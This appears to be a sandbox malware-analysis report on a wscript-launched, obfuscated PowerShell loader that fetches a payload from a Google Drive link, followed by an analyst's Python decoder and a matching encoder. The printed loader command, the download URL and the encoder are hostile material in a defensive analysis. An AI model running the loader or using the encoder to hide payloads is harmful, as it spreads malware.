Source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ |
Source: powershell.exe, 00000008.00000002.1468594433.000001D3DC68A000.00000004.00000020.00020000.00000000.sdmp |
Binary string: .pdbn8 |
Source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT |
Source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp |
Binary string: .pdbc |
Source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp |
Binary string: scorlib.pdb= |
Source: powershell.exe, 00000008.00000002.1469726606.000001D3DC872000.00000004.00000020.00020000.00000000.sdmp |
Binary string: U'n.pdb |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DF4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pe |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DB7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C459B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaWP |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4BDB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: amsi64_7432.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= S |
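Worked decoder for the command line above (an added analyst example, not part of the sandbox report or the sample). The captured Shouse function keeps one character out of every six, starting at index 5, and because $Fertilizations is never assigned and $mussack is incremented only when $host.PrivateData is non-null (as it is in the normal console host), the loop bound is Length-1 and the last stride position, always a trailing space in these arguments, is dropped; Lnder then dot-sources the decoded $Blyantstifter ("iEX") on its argument, i.e. Invoke-Expression. The two short arguments below are copied verbatim from the process-creation line and decode to "iEX" and ">". Decoding the longer arguments by hand gives the header name useR-AgEnt, the Firefox/121.0 User-Agent string and the drive.google.com/uc?export=download URL that the HTTP traffic lines show, but they are not fed to the script: the report extraction appears to have dropped non-ASCII filler characters (compare "Fllesspisninger"), which shifts the stride after each missing character. The obfuscate() encoder, its filler text and the SAMPLE_CMDLINE excerpt are constructed for the demonstration; the round trip through the Drive URL shows why the PrivateData check matters, since without it the decoded string keeps a trailing space and `. iEX ` no longer resolves.

```python
import itertools
import re

# Constructed filler for the encoder; the real sample uses Danish dictionary words.
FILLER = "Ramphastidae Misemphasization Truncal Overvaere Blokdiagram "

# URL exactly as it appears in the report's HTTP traffic lines.
DRIVE_URL = "https://drive.google.com/uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW"

# Two Shouse arguments copied verbatim from the captured command line.
BLYANTSTIFTER = " EosiiLaendESoralX.emig "
CITRONSOMMERFUGLENS = "polit>H rry "

# Constructed excerpt of the command line (verbatim assignments) for the extractor.
SAMPLE_CMDLINE = (
    "$citronsommerfuglens=Shouse 'polit>H rry ';"
    "$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';"
)


def shouse(encoded: str, host_has_private_data: bool = True) -> str:
    """Python port of the captured Shouse function.

    $Fertilizations is never assigned, so it contributes 0.  $mussack is
    incremented once only when $host.PrivateData is non-null (true in the
    normal console host), making the loop bound Length-1 so the final stride
    position is skipped.  Characters at 5, 11, 17, ... below the bound are kept.
    """
    fertilizations = 0                         # $Fertilizations: unset -> 0
    mussack = 1 if host_has_private_data else 0
    limit = fertilizations + len(encoded) - mussack
    return "".join(encoded[i] for i in range(5, limit, 6))


def obfuscate(plain: str, filler: str = FILLER) -> str:
    """Inverse of shouse(): five filler characters before each payload
    character, then one more group whose payload is a space, matching the
    trailing space every captured argument ends with.  This encoder is a
    reconstruction for demonstration, not code recovered from the sample."""
    src = itertools.cycle(filler)
    out = []
    for ch in plain + " ":
        out.append("".join(next(src) for _ in range(5)))
        out.append(ch)
    return "".join(out)


SHOUSE_ASSIGNMENT = re.compile(r"\$(\w+)=Shouse '([^']*)'")


def decode_shouse_args(cmdline: str, host_has_private_data: bool = True) -> dict:
    """Map each $Variable=Shouse '...' assignment in a command line to its
    decoded value, so the variables can be read in the rest of the script."""
    return {
        name: shouse(arg, host_has_private_data)
        for name, arg in SHOUSE_ASSIGNMENT.findall(cmdline)
    }


if __name__ == "__main__":
    for name, value in decode_shouse_args(SAMPLE_CMDLINE).items():
        print(f"${name} -> {value!r}")
    # In a host without PrivateData the trailing filler survives, so the
    # dot-sourced command name would be "iEX " rather than "iEX".
    print(repr(shouse(BLYANTSTIFTER, host_has_private_data=False)))
    encoded_url = obfuscate(DRIVE_URL)
    print(shouse(encoded_url) == DRIVE_URL)
```

Run against a full command line captured from a wscript.exe -> powershell.exe parent/child pair like the one above, decode_shouse_args() recovers the download URL and header values without executing anything; the same regex can be pointed at the AMSI buffer (amsi64_7432.amsi.csv) that the matched rule was evaluated over.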